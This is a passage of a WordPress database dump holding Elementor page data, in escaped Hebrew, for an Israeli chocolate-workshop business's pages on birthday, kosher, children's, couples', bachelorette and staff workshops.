\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2280,430,'_elementor_edit_mode','builder'),(2281,430,'_elementor_template_type','wp-page'),(2282,430,'_elementor_version','2.7.5'),(2283,430,'_elementor_pro_version','2.7.3'),(2284,430,'_wp_page_template','elementor_header_footer'),(2285,430,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2286,430,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3